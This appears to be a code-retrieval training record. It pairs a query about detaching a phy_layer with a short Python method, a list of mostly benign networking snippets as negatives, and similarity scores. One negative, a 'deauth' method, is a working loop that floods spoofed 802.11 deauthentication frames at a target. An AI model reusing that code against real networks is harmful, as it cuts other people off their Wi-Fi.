device.keys() and\n device['name'] == target_name):\n bonded = True\n break\n bonded = False\n target_name = self.cen_ad.droid.bluetoothGetLocalName()\n while time.time() < start_time and bonded == False:\n bonded_devices = \\\n self.per_ad.droid.bluetoothGetBondedDevices()\n for device in bonded_devices:\n if ('name' in device.keys() and\n device['name'] == target_name):\n bonded = True\n break\n for ad in [self.cen_ad, self.per_ad]:\n if not clear_bonded_devices(ad):\n return False\n # Necessary sleep time for entries to update unbonded state\n time.sleep(2)\n bonded_devices = ad.droid.bluetoothGetBondedDevices()\n if len(bonded_devices) > 0:\n self.log.error(\"Failed to unbond devices: {}\".format(\n bonded_devices))\n return False\n return self._orchestrate_gatt_disconnection(bluetooth_gatt,\n gatt_callback)", "def setup(wlan_type, wlan_name, alias, password, log_level):\n if alias is None:\n alias = click.prompt('Alias')\n if wlan_name is None:\n wlan_name = click.prompt(\"Wlan_name\")\n if wlan_type is None:\n wlan_type = click.prompt(\"Wlan-type\", type=click.Choice(['0', '1', '2', '3']))\n if wlan_type != '0' and password is None:\n password = getpass()\n setup_logging(log_level)\n wlan_type = int(wlan_type)\n 
tcp_setup(wlan_type, wlan_name, alias, password)", "def syncloss(self):\n # expect a disassociation indication with a correct status\n assert(self.a.nxapi_disassociate_ind() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def enqueue(self, packet):\n\t\tlog('queue-start %d %d' % (self.id, packet.id))\n\t\tself.queue.appendleft(packet)\n\t\tif not self.busy:\n\t\t\tsimulator.new_thread(self.__transmit())", "def connect(self, name, group, de, port, board, build):\n print 'connecting to DAC board: {} (build #{})'.format(\n self.macFor(board), build)\n\n self.boardGroup = group\n self.server = de\n self.cxn = de._cxn\n self.ctx = de.context()\n self.port = port\n self.board = board\n self.build = build\n self.MAC = self.macFor(board)\n self.devName = name\n self.serverName = de._labrad_name\n self.timeout = T.Value(1, 's')\n\n # Set up our context with the ethernet server\n # This context is expired when the device shuts down\n p = self.makePacket()\n p.connect(port)\n p.require_length(self.READBACK_LEN)\n p.destination_mac(self.MAC)\n p.require_source_mac(self.MAC)\n p.timeout(self.timeout)\n p.listen()\n yield p.send()\n\n # Get board specific information about this device.\n # We talk to the labrad system using a new context and close it when\n # done.\n reg = self.cxn.registry\n ctxt = reg.context()\n p = reg.packet()\n p.cd(['', 'Servers', 'GHz FPGAs'])\n p.get('dac' + self.devName.split(' ')[-1], key='boardParams')\n try:\n resp = yield p.send()\n boardParams = resp['boardParams']\n self.parseBoardParameters(boardParams)\n finally:\n yield self.cxn.manager.expire_context(reg.ID, context=ctxt)", "def setBw(self, newapif, mode): \n self.newapif = newapif\n bandwidth = wifiParameters.set_bw(mode)\n os.system(\"tc qdisc add dev %s root tbf rate %smbit latency 2ms burst 15k\" % (self.newapif, bandwidth))", "def connect(self, kern):\n self.driver = Board(kern)\n self.print_log(1, \"CONNECTION SUCCESSFUL\")" ]
[ "0.5359344", "0.51606864", "0.4981618", "0.49739328", "0.49689108", "0.49641663", "0.482585", "0.4784602", "0.47822216", "0.47765702", "0.4733921", "0.4723825", "0.4697315", "0.46468836", "0.46253222", "0.46140853", "0.46140155", "0.46135888", "0.45908052", "0.45793292", "0.45776454", "0.45742673", "0.45740297", "0.45740297", "0.45718834", "0.45308128", "0.45279413", "0.45242798", "0.45204872", "0.4508078", "0.45040312", "0.4501821", "0.44657657", "0.44443727", "0.44343436", "0.44330058", "0.4418028", "0.44109932", "0.43927443", "0.4387387", "0.43872634", "0.43800548", "0.4379786", "0.4361285", "0.4350801", "0.4349083", "0.43372932", "0.43370342", "0.4333077", "0.4329811", "0.4308574", "0.43032354", "0.4303217", "0.42972776", "0.42972043", "0.42965746", "0.42892408", "0.42787042", "0.4277107", "0.42737016", "0.42727795", "0.42604038", "0.42603043", "0.42574283", "0.42537433", "0.4249839", "0.4249274", "0.42461434", "0.42431885", "0.42402044", "0.422947", "0.42271227", "0.42244792", "0.4219908", "0.42165247", "0.42111513", "0.42093343", "0.4205679", "0.42051917", "0.41997868", "0.41906565", "0.41885245", "0.41881785", "0.41857627", "0.41834426", "0.41790697", "0.41712183", "0.4167612", "0.41564205", "0.415556", "0.41553047", "0.4155138", "0.41524455", "0.41484982", "0.41469646", "0.41444692", "0.41379744", "0.41361582", "0.41290686", "0.41266423" ]
0.6782705
0
Detach the given phy_layer from the channel
def detach(self, phy_layer):\n self._attached_phys.remove(phy_layer)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_layer(self, layer: CommandLayer):\n try:\n index = self.command_layers.index(layer)\n except ValueError:\n return\n\n if layer.active: # Transfer the active status to another layer\n if index < 0: # ... to the previous layer in the stack\n before = self.command_layers[index - 1]\n before.active = True\n elif len(self.command_layers) > 1: # ... to the next layer\n next = self.command_layers[index + 1]\n next.active = True\n\n self.command_layers.remove(layer)\n self._save()", "def remove_layer(self, layer=None):\n\t\tif layer is not None:\n\t\t\ttry:\n\t\t\t\tself.sublayers.remove(layer)\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\telif self.superlayer is not None:\n\t\t\tself.superlayer.remove_layer(self)", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):", "def port_nic_remove(switch, port):\n client.port.detach_nic(switch, port)", "def dropchan(channel):", "def remove_layer(self, layer_key_name):\n del(self.config.layers[layer_key_name])", "def detach_channel_group_from_port(self, group):\n ckresult(_dll.FMOD_System_DetachChannelGroupFromPort(self._ptr, group._ptr))", "def deconv_layer(self, dtype,\n N, C, K,\n M, P, Q,\n T=1, R=1, S=1,\n pad_d=0, pad_h=0, pad_w=0,\n str_d=1, str_h=1, str_w=1,\n dil_d=1, dil_h=1, dil_w=1):\n return layer_mkl.DeconvLayerMKL(self, dtype, N, C, K, M, P, Q, T, R, S,\n pad_d, pad_h, pad_w, str_d, str_h, str_w,\n dil_d, dil_h, dil_w)", "def add_drop_out_layer(self, input_layer):\n return tf.nn.dropout(input_layer, self.keep_prob)", "def delete_layer(LayerId=None):\n pass", "def detach_display(self, display):\n self.extra_displays.remove(display)\n self.removeDockWidget(display)\n #self.display_detached.emit(display)", "def disconnect_disk(self, instance, stg_ftsk=None, disk_type=None):\n raise NotImplementedError()", "def RemoveLayer(self, *args):\n return _XCAFDoc.XCAFDoc_LayerTool_RemoveLayer(self, *args)", "def __delitem__(self, key_mac):\n self.ingress_tbl.pop(key_mac, None)\n rsw = self.rootsw_tbl.pop(key_mac, None)\n if rsw:\n rsw.leaf_macs.discard(key_mac)", "def remove_node():\n\ttry:\n\t\tnetwork.remove_connection()\n\texcept ValueError as err:\n\t\tfeedback.config(text=err)", "def remove_layer(self, layer_pos):\n self.stack.pop(layer_pos)\n return", "def _dropout_from_layer(rng, layer, p):\r\n srng = theano.tensor.shared_randomstreams.RandomStreams(\r\n rng.randint(999999))\r\n \r\n # p=1-p because 1's indicate keep and p is prob of dropping\r\n mask = srng.binomial(n=1, p=1-p, size=layer.shape)\r\n # The cast is important because\r\n # int * float32 = float64 which pulls things off the gpu\r\n output = layer * T.cast(mask, theano.config.floatX)\r\n return output", "def detach(self):\n raise io.UnsupportedOperation", "def disconnect(src, target, reftype):", "def _dropout_from_layer(rng, layer, p):\n srng = theano.tensor.shared_randomstreams.RandomStreams(\n rng.randint(999999))\n # p=1-p because 1's indicate keep and p is prob of dropping\n mask = srng.binomial(n=1, p=1-p, size=layer.shape)\n # The cast is important because\n # int * float32 = float64 which pulls things off the gpu\n output = layer * T.cast(mask, theano.config.floatX)\n return output", "def detach(cls, factory, attrib_name):\n cls._to_attach.remove((factory, attrib_name))", "def _dropout_from_layer(rng, layer, p):\n srng = theano.tensor.shared_randomstreams.RandomStreams(\n rng.randint(999999))\n # p=1-p because 1's indicate keep and p is prob of dropping\n mask = srng.binomial(n=1, p=1.0-p, size=layer.shape)\n # The cast is important 
because\n # int * float32 = float64 which pulls things off the gpu\n output = layer * T.cast(mask, theano.config.floatX)\n return output", "def detach_pd(self, conn, host, pd):\n zone = self.get_zone(conn, host)\n pdhost = self.get_pd_host(conn, pd, zone)\n if pdhost == \"\":\n self.tracer.info(\n \"disk %s is already attached to %s(%s)\" % (pd, host, zone))\n elif pdhost == host:\n self.tracer.info(\"attempting to detach %s from %s(%s)\" % (pd, host, zone))\n operation = conn.instances().detachDisk(project=PROJECT, zone=zone, instance=host, deviceName=pd).execute()\n self.wait_for_operation(conn, operation, zone)\n if self.get_pd_host(conn, pd, zone) == \"\":\n self.tracer.info(\"successfully detached %s from %s(%s)\" % (pd, host, zone))", "def _DetachDisk(self, idx, root, _):\n hotmsg = \"\"\n if self.op.hotplug:\n hotmsg = self._HotplugDevice(constants.HOTPLUG_ACTION_REMOVE,\n constants.HOTPLUG_TARGET_DISK,\n root, None, idx)\n\n # Always shutdown the disk before detaching.\n ShutdownInstanceDisks(self, self.instance, [root])\n\n # Rename detached disk.\n #\n # Transform logical_id from:\n # <file_storage_dir>/<instance_name>/<disk_name>\n # to\n # <file_storage_dir>/<disk_name>\n if root.dev_type in (constants.DT_FILE, constants.DT_SHARED_FILE):\n file_driver = root.logical_id[0]\n instance_path, disk_name = os.path.split(root.logical_id[1])\n new_path = os.path.join(os.path.dirname(instance_path), disk_name)\n new_logical_id = (file_driver, new_path)\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(root, new_logical_id)])\n result.Raise(\"Failed before detach\")\n # Update logical_id\n self.cfg.SetDiskLogicalID(root.uuid, new_logical_id)\n\n # Remove disk from config\n self.cfg.DetachInstanceDisk(self.instance.uuid, root.uuid)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n return hotmsg", "def _dropout_from_layer(rng, layer, p):\n srng = theano.tensor.shared_randomstreams.RandomStreams(\n rng.randint(999999))\n # p=1-p because 1's indicate keep and p is prob of dropping\n mask = srng.binomial(n=1, p=1-p, size=layer.shape)\n # The cast is important because\n # int * float32 = float64 which pulls things off the gpu\n output = layer * T.cast(mask, theano.config.floatX) * T.cast(1./(1. 
- p),theano.config.floatX)\n return output", "def unsubscribe(self, tag):\n self.socket.setsockopt(constants.UNSUBSCRIBE, tag)", "def deauthentication_from_ap(self):\n # send deauthentication\n self.ap1.tx_msdu(da=self.host.macaddr, body=wifi.deauthenticate(), \n fctl=wifi.fctl_deauthentication)\n\n # expect a disassociation indication with a correct status\n assert(self.a.nxapi_disassociate_ind() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def detach(self):\n raise NotImplementedError()", "def del_connection(self, switch_name, port1, port2, bidir=False):\n raise NotImplementedError()", "def detach_updater(self, fgraph, u):\r\n if u is not None:\r\n fgraph.remove_feature(u)", "def desubscribe(self, subscription):\n try:\n if isinstance(subscription, Subscription):\n sub = DeSubscribe(subscription, self.__pool, self.myAddress)\n self.send(self.__pool, sub)\n except Exception:\n handle_actor_system_fail()", "def disconnect(scope, target) -> None:\n target.dis()\n scope.dis()", "def disconnectChannel(sock, chan):\n sock.send(\"PART {}\\r\\n\".format(chan).encode(\"utf-8\"))\n console.info(\"Successfully disconnected from {}\".format(chan))", "def deauth(self):\n # https://man7.org/linux/man-pages/man7/packet.7.html\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)\n s.bind((self.interface, 0))\n\n # The RadioTap version is always 0\n rt_version = 0\n # The padding is always 0\n rt_padding = 0\n # The empty RadioTap frame has length of 8 bytes\n rt_length = 8\n # The RadioTap flags are irrelevant\n rt_flags = 0 \n # Construct the empty RadioTap frame (1,1,2,4 bytes)\n # https://docs.python.org/3/library/struct.html\n rt_frame = struct.pack(\n 'BBHI',\n rt_version,\n rt_padding,\n rt_length,\n rt_flags\n )\n\n # The 802.11 de-authentication subtype(4bits), type(2bits), version(2bits)\n dot11_type = int(b'11000000', 2)\n # The 802.11 flags are irrelevant\n dot11_flags = 0 \n # The 802.11 duration is irrelevant\n dot11_dur = 0\n # The 802.11 receiver address\n dot11_ra = bytes(map(lambda x: int(x, 16) , self.target_addr.split(':')))\n # The 802.11 transmitter address\n dot11_ta = bytes(map(lambda x: int(x, 16) , self.access_point.split(':')))\n # The 802.11 access point address\n dot11_ap = dot11_ta\n # The 802.11 sequence control is irrelevant\n dot11_sc = 0\n # The 802.11 reason code is irrelevant (0 is fine)\n dot11_reason = 0\n # Construct the 802.11 frame (1,1,2,6,6,6,2,2 bytes)\n # https://docs.python.org/3/library/struct.html\n dot11_frame = struct.pack(\n 'BBH6s6s6sHH',\n dot11_type,\n dot11_flags,\n dot11_dur,\n dot11_ra,\n dot11_ta,\n dot11_ap,\n dot11_sc,\n dot11_reason\n )\n\n # Construct the full payload (RadioTap + 802.11)\n payload = rt_frame + dot11_frame \n\n # Send packets while running and sending\n while 1:\n while self.sending:\n s.send(payload)\n time.sleep(1)", "def remove_descriptor(self, uuid):", "def UnSetOneLayer(self, *args):\n return _XCAFDoc.XCAFDoc_LayerTool_UnSetOneLayer(self, *args)", "def del_edge (self, src, dst):\n raise NotImplementedError", "def DeleteLayer(self, event):\n pass", "def detach_volume(self, host_path: str):\n del self.volumes[host_path]", "def disconnect_subscriber(reply_channel):\n try:\n send_disc_message_to_channel(reply_channel)\n except Exception as exc:\n print(str(exc))\n\n disconnect_in_subscribers(reply_channel)", "def delete_layer(self, index) :\n \n # Remove the actor, 
delete the list item, and update the other layers.\n self._renderer.RemoveActor(self._layers[index].actor)\n del self._layers[index]\n self._update_layers_positions()", "def DisconnectByEdgeInNetwork(self, edge):\n try:\n self.connections.remove((edge.node1, edge.node2))\n edge.node1.removeNeighbour(edge.node2.index)\n except Exception as exc:\n print(\"Exception {} occured when trying to disconnect the edge\".format(exc))", "def rmv_chnl(self, chnl):\n\n chnl = self.chnls.pop(self.chnls.index(chnl))\n\n self.channels_layout.removeWidget(chnl)\n\n chnl.setParent(None)", "def _clearLayer(self, layer=0):\n for i in self._existingLayerItems(layer):\n self._plt.removeItem(i)", "def unplug(self, instance_id, hyper_vif):\n return self.client.cast(self.context,\n 'unplug',\n instance_id=instance_id,\n hyper_vif=hyper_vif)", "def dropout_from_layer(rng, layer, p):\n\n srng = theano.tensor.shared_randomstreams.RandomStreams(rng.randint(999999))\n mask = srng.binomial(n=1, p=1-p, size=layer.shape)\n output = layer * T.cast(mask, theano.config.floatX)\n return output", "def fusion_api_delete_ethernet_network(self, name=None, uri=None, param='', api=None, headers=None):\n return self.ethernet_network.delete(name=name, uri=uri, param=param, api=api, headers=headers)", "def detach_tool_controller(*args):\n selection = pm.ls(selection=True)\n\n tools = 0 # Keep track of whether or not we have any tools\n for sel in selection:\n # Check if the selection is part of a valid robot\n if get_robot_roots(sel=[sel]):\n # Check if the selection is a valid tool controller\n if 'tool_CTRL' in str(sel):\n # If so unlock the robot's target_CTRL translate and\n # rotate attributes and parent the tool_CTRL to the world\n robot = get_robot_roots(sel=[sel])[0]\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_fk_path = get_tool_ctrl_fk_path(robot)\n\n pm.delete(target_ctrl_path + '|targetToToolCtrl_pCnst')\n pm.delete(tool_ctrl_fk_path)\n\n try: \n pm.setAttr(target_ctrl_path + '.translate', lock=False)\n pm.setAttr(target_ctrl_path + '.rotate', lock=False)\n except:\n pm.warning('Mimic: target_CTRL.translate is from a referenced file, and cannot be unlocked.')\n\n pm.parent(sel, world=True, absolute=True)\n tools = 1 # Our selection is a tool controller\n pm.headsUpMessage('Tool Controller detached successfuly!')\n\n # If there were no tools in our selection, alert the user\n if not tools:\n pm.warning('No tool controllers selected')\n return", "def del_router_info(self):\n debug.info(0,\"Erasing router info\")\n layer_num = techlayer[\"text\"]\n self.cell.objs = [x for x in self.cell.objs if x.layerNumber != layer_num]", "def disconnect(self, driver):\n self.device.ctrl.sendline('\\x03')\n self.device.ctrl.sendline('\\x04')", "def unplug(self, bridge):\n ovsdb = self.bridge.ovsdb\n with ovsdb.transaction() as txn:\n if self.bridge.exists():\n txn.add(ovsdb.del_port(self.patch_port_trunk_name,\n self.bridge.br_name))\n txn.add(ovsdb.del_port(self.patch_port_int_name,\n bridge.br_name))", "def detach_typed_link(self, typed_link_specifier: Dict[str, Any]):\n return cd_client.detach_typed_link(\n DirectoryArn=self._dir_arn,\n TypedLinkSpecifier=typed_link_specifier\n )", "def attach(self, phy_layer):\n self._attached_phys.append(phy_layer)", "def _DisconnectAP(self):\n disconnect_command = 'iw dev {interface} disconnect'.format(\n interface=self.interface)\n # This call may fail if we are not connected to any network.\n self._device.Call(disconnect_command)", "def disassociation_from_ap(self):\n # send 
disassociation\n self.ap1.tx_msdu(da=self.host.macaddr, body=wifi.disassociation(), \n fctl=wifi.fctl_disassociation)\n \n # expect a deauth frame\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n \n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_deauthentication)\n \n # expect a disassociation indication with a correct status\n assert(self.a.nxapi_disassociate_ind() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def detached(self, mind):\n self.remote = None\n players.remove(self)", "def detachDiskFromMinipad(self , disk):\n return", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):\n vhd_name = connection_info['data']['disk_name']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n not_found = True\n for i in range(len(data_disks)):\n if vhd_name == data_disks[i].name:\n del data_disks[i]\n not_found = False\n break\n if not_found:\n LOG.info(_LI('Volume: %s was not attached to Instance!'),\n vhd_name, instance=instance)\n return\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Detach Volume to Instance in Azure finish\"),\n instance=instance)", "def do_network_detach(cs, args):\n opts = {}\n opts['container'] = args.container\n opts['network'] = args.network\n opts['port'] = args.port\n opts = zun_utils.remove_null_parms(**opts)\n try:\n cs.containers.network_detach(**opts)\n print(\"Request to detach network from container %s \"\n \"has been accepted.\" % args.container)\n except Exception as e:\n print(\"Detach network from container %(container)s \"\n \"failed: %(e)s\" % {'container': args.container, 'e': e})", "async def unlink(self, ctx: MyContext):\n query = \"SELECT * FROM wormhole_channel WHERE channelID = ?\"\n wh_channel = self.bot.db_query(\n query, (ctx.channel.id,), astuple=True, fetchone=True\n )\n # comes as: (name, channelID, guildID, type, webhookID, webhookTOKEN)\n if len(wh_channel) == 0:\n await ctx.send(await self.bot._(ctx.guild.id, \"wormhole.error.not-linked\"))\n return\n query = \"DELETE FROM wormhole_channel WHERE channelID = ? 
AND name = ?\"\n async with ClientSession() as session:\n webhook = discord.Webhook.partial(\n wh_channel[4], wh_channel[5], session=session\n )\n await webhook.delete()\n self.bot.db_query(query, (wh_channel[0], ctx.channel.id))\n await ctx.send(\n await self.bot._(ctx.guild.id, \"wormhole.success.channel-unlinked\")\n )", "def dmcrypt_unmap(\n _uuid\n ):\n args = [\n 'cryptsetup',\n 'remove',\n _uuid\n ]\n\n try:\n command_check_call(args)\n\n except subprocess.CalledProcessError as e:\n raise Error('unable to unmap device', _uuid, e)", "def disconnect_disk_from_mgmt(self, vios_uuid, disk_name):\n raise NotImplementedError()", "def deauthentication_from_user(self):\n # disassociate\n self.a.nxapi_disassociate_req(self.ap1.macaddr)\n \n # expect a deauth frame\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n \n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_deauthentication)\n \n # expect a disassociation confirmation with a correct status\n assert(self.a.nxapi_disassociate_cfm() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def unlink_from(self, criterion_or_node):\n if callable(criterion_or_node):\n target_node = criterion_or_node(self.graph.handle)\n else:\n target_node = criterion_or_node\n self.send(target_node, 'drop_link',\n originating_node=self.id)", "def pcp_detach_node(self, nid):\n\t\treturn self._pcp_detach_node(nid, False)", "def dropout(self, input_layer, keep_prob=0.5):\n if self.is_training:\n dtype = input_layer.dtype\n with tf.variable_scope(self._count_layer('dropout')):\n keep_prob_tensor = tf.constant(keep_prob, dtype=dtype)\n return tf.nn.dropout(input_layer, keep_prob_tensor)\n else:\n return input_layer", "def unregister(self, parent):\n parent.unregisterCommand('LayerData')\n parent.unregisterCommand('LayerDataDecoded')", "def unsubscribe_symbol(self, symbol):\n try:\n self.symbol.pop(symbol, None)\n self.symbol_data.pop(symbol, None)\n except KeyError:\n print(\"Could not unsubscribe symbol {} as it was never subscribed.\".format(str(symbol)))", "def detach_rule(self, detach_rule):\n\n self._detach_rule = detach_rule", "def remove_peer(self, writer):\r\n address = self.get_address_string(writer)\r\n self.connection_pool[address] = writer\r\n logger.info(\"Removed peer to pool\", address=address)", "def unplug(self, bridge):\n ovsdb = self.bridge.ovsdb\n with ovsdb.transaction() as txn:\n txn.add(ovsdb.del_port(self.patch_port_int_name,\n bridge.br_name))", "def drop_channel(self, channel):\n return self.clients.pop(channel, None)", "def disconnectJoint(*args, attachHandleMode: bool=True, deleteHandleMode: bool=True,\n **kwargs)->AnyStr:\n pass", "def deallocate_for_instance(self, context, instance, **kwargs):\n args = kwargs\n args['instance_id'] = instance['id']\n args['project_id'] = instance['project_id']\n rpc.cast(context, FLAGS.network_topic,\n {'method': 'deallocate_for_instance',\n 'args': args})", "def network_delete(auth=None, **kwargs):\n cloud = get_operator_cloud(auth)\n kwargs = _clean_kwargs(**kwargs)\n return cloud.delete_network(**kwargs)", "def disconnect(self):\n \n self.net.active(False)", "def detach_plot(self):\n detached = tk.Toplevel(self)\n detached.wm_title(\"Glycoprotein\")\n fig = mpl.figure.Figure(figsize=(5, 4), dpi=100)\n ax = fig.add_subplot(111)\n chid = self.chain.get()\n\n l = len(self.myGlycosylator.sequences[chid])\n sequons = [k for k in 
self.myGlycosylator.sequons.keys() if chid in k[:len(chid)]]\n trees = self.original_glycans.copy()\n trees.update(self.linked_glycans)\n self.myDrawer.draw_glycoprotein(l, self.myGlycosylator.get_start_resnum(chid), sequons, ax = ax, axis = 0,\n trees = trees, names = self.names, sequon_color = self.sequon_colors)\n ax.axis('equal')\n ax.axis('off')\n\n canvas = FigureCanvasTkAgg(fig, master=detached)\n canvas.show()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n toolbar = NavigationToolbar2TkAgg(canvas, detached)\n toolbar.update()\n canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)", "def remove_edge(self, edge: Edge) -> Edge:", "def disconnect(cnxDict):\n for i, jnt in enumerate(cnxDict[\"joints\"]):\n # we don't need to disconnect blended joint since the connection is\n # from other joints\n if not jnt.startswith(\"blend_\"):\n oJnt = pm.PyNode(jnt)\n\n for e, chn in enumerate(SRT_CHANNELS):\n plug = oJnt.attr(chn)\n if cnxDict[\"attrs\"][i][e]:\n pm.disconnectAttr(cnxDict[\"attrs\"][i][e], plug)\n if cnxDict[\"attrs\"][i][13]:\n pm.disconnectAttr(\n oJnt.parentInverseMatrix[0], cnxDict[\"attrs\"][i][13])", "def detach(self):\n # if i don't have an existing connection to the back end, do nothing\n if self.connection is None: return\n\n # otherwise, close the connection\n status = self.postgres.disconnect(self.connection)\n # invalidate the member\n self.connection = None\n\n # and return the status\n return status", "def off(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n if self._pre_off_func:\n self._pre_off_func()\n switchboard = self._get_switchboard_if_initialized()\n if self._power_and_data_share_cable:\n if switchboard:\n switchboard.add_log_note(\n f\"comm_power.off() called on {self._device_name} set communication \"\n f\"port {self.port_number} to charge as device has a single USB \"\n \"cable for data and power.\")\n switchboard.close_all_transports()\n self._hub.switch_power.power_on(self.port_number, data_sync=False)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_on(\n self.secondary_port_number, data_sync=False)\n else:\n if switchboard:\n switchboard.close_all_transports()\n self._hub.switch_power.power_off(self.port_number)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_off(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_off()", "async def removejoinchannel(self, ctx: commands.Context, channel: discord.TextChannel):\n db_session = self.bot.create_db_session()\n\n try:\n existing = db_session.query(Channel).filter(Channel.id == channel.id).one()\n existing.joinable = False\n except NoResultFound:\n await ctx.send(f\"There was no record for {channel.mention}. 
The channel is not currently joinable.\")\n return\n\n db_session.commit()\n db_session.close()\n await ctx.send(f\"{channel.mention} was removed as a joinable channel.\")", "def detach_volume(self,\n connection_info,\n instance,\n mountpoint,\n encryption=None):\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n name = volume_data['name']\n filtered_disks = [disk for disk in data_disks if disk.name != name]\n if len(filtered_disks) == len(data_disks):\n LOG.error(\"Volume %s was not attached to instance %s\" %\n (name, instance.uuid))\n return\n azure_instance.storage_profile.data_disks = filtered_disks\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Detached volume %s from instance %s\" % (name, instance.uuid))", "def remove_device(hass: HomeAssistant, mac: str):\n registry = dr.async_get(hass)\n device = registry.async_get_device({(DOMAIN, mac)}, None)\n if device:\n registry.async_remove_device(device.id)", "async def async_unjoin_me(self):\n if self._multiroom_wifidirect:\n for dev in self._multiroom_group:\n for device in self.hass.data[DOMAIN].entities:\n if device._is_master: ## TODO!!!\n cmd = \"multiroom:SlaveKickout:{0}\".format(self._slave_ip)\n value = await self._master.async_call_linkplay_httpapi(cmd, None)\n self._master._position_updated_at = utcnow()\n\n else:\n cmd = \"multiroom:Ungroup\"\n value = await self.async_call_linkplay_httpapi(cmd, None)\n\n if value == \"OK\":\n if self._master is not None:\n await self._master.async_remove_from_group(self)\n # await self._master.async_schedule_update_ha_state(True)\n self._multiroom_unjoinat = utcnow()\n self._master = None\n self._is_master = False\n self._slave_mode = False\n self._slave_ip = None\n self._multiroom_group = []\n # await self.async_schedule_update_ha_state(True)\n\n else:\n _LOGGER.warning(\"Failed to unjoin_me from multiroom. 
\" \"Device: %s, Got response: %s\", self.entity_id, value)", "def unsubscribe(self, channel, update_handler=None):\n pass", "def protocol(ctx: Context, public_id: PublicId):\n _eject_item(ctx, \"protocol\", public_id)", "def disconnect(self):\n self.blnkt.disconnect()", "def remove_connection(self, var1, var2):\n conn, swap = self._find_connection_element(var1, var2)\n if not conn:\n raise ModelModificationError(\"Cannot remove non-existent connection.\")\n if swap:\n var1, var2 = var2, var1\n # Find the relevant map_variables element\n mapv = conn.xml_xpath(u'cml:map_variables[@variable_1=\"%s\" and @variable_2=\"%s\"]'\n % (var1.name, var2.name))\n if not mapv:\n raise ModelModificationError(\"Cannot remove non-existent connection.\")\n conn.xml_remove_child(mapv[0])\n if not hasattr(conn, u'map_variables'):\n conn.xml_parent.xml_remove_child(conn)", "def Disconnect(self):\n if not self._auth_process or not self._dhcp_process:\n raise WiFiError('Must connect before disconnecting')\n\n self.ip = None\n dhcp_process, self._dhcp_process = self._dhcp_process, None\n auth_process, self._auth_process = self._auth_process, None\n next(dhcp_process)\n next(auth_process)\n\n # Remove temporary directory.\n if not self._user_tmp_dir:\n self._tmp_dir_handle.__exit__(None, None, None)\n self._tmp_dir = None", "def unconfigure_lldp_tlv_select(device, tlv):\r\n configs = [f'no lldp tlv-select {each_tlv}' for each_tlv in tlv] if isinstance(tlv, list) else [f'no lldp tlv-select {tlv}']\r\n try:\r\n device.configure(configs)\r\n except SubCommandFailure as e:\r\n raise SubCommandFailure(\r\n \"Could not unconfigure LLDP tlv-select\"\r\n \"Error: {error}\".format(error=e)\r\n )", "def detachDeviceAttr(*args, all: bool=True, attribute: AnyStr=\"\", axis: AnyStr=\"\", device:\n AnyStr=\"\", selection: bool=True, q=True, query=True, **kwargs)->Union[None,\n Any]:\n pass", "def remove_link(self,link,verbose=False):\n label, child = link\n self.outgoing.remove((label,child))\n child.incoming.remove((label,self))\n if verbose: print('removed', label, self.nodeid, child.nodeid)", "def disconnect(self, plug):\n if plug in self.connections:\n self.connections.pop(self.connections.index(plug))\n self.is_dirty = True\n if self in plug.connections:\n plug.connections.pop(plug.connections.index(self))\n plug.is_dirty = True", "def docker_network_disconnect(args, container_id, network): # type: (EnvironmentConfig, str, str) -> None\n docker_command(args, ['network', 'disconnect', network, container_id], capture=True)", "def castle_collection_detach(conn, coll):\n pycastle_log.debug(\"entering with conn = \"+str(conn)+\" coll = \"+str(coll))\n ret = libcastle.castle_collection_detach(conn, coll)\n if ret != 0:\n raise CastleCollectionDetachException(ret)\n pycastle_log.debug(\"Detached from coll number \"+str(coll))", "def detach_elastic_load_balancer(ElasticLoadBalancerName=None, LayerId=None):\n pass", "def detach_from_network(self, network):\n # type: ( Union[Network,BoundNetwork]) -> BoundAction\n return self._client.detach_from_network(self, network)", "def delete_overlay_network(self, name=NETWORK_NAME):\n try:\n # An overlay network is usually created in host belonging to a swarm\n self.leave_swarm()\n network = self.docker_client.networks.get(name)\n network.remove()\n except docker.errors.NotFound as nf:\n print(\"Network \"+name+\" not found\")\n except docker.errors.APIError as de:\n print(\"Error deleting overlay network\")\n print de\n exit(1)\n return", "def unplug_port_from_network(self, device_id, 
device_owner, hostname,\n port_id, network_id, tenant_id, sg, vnic_type,\n switch_bindings=None, segments=None):" ]
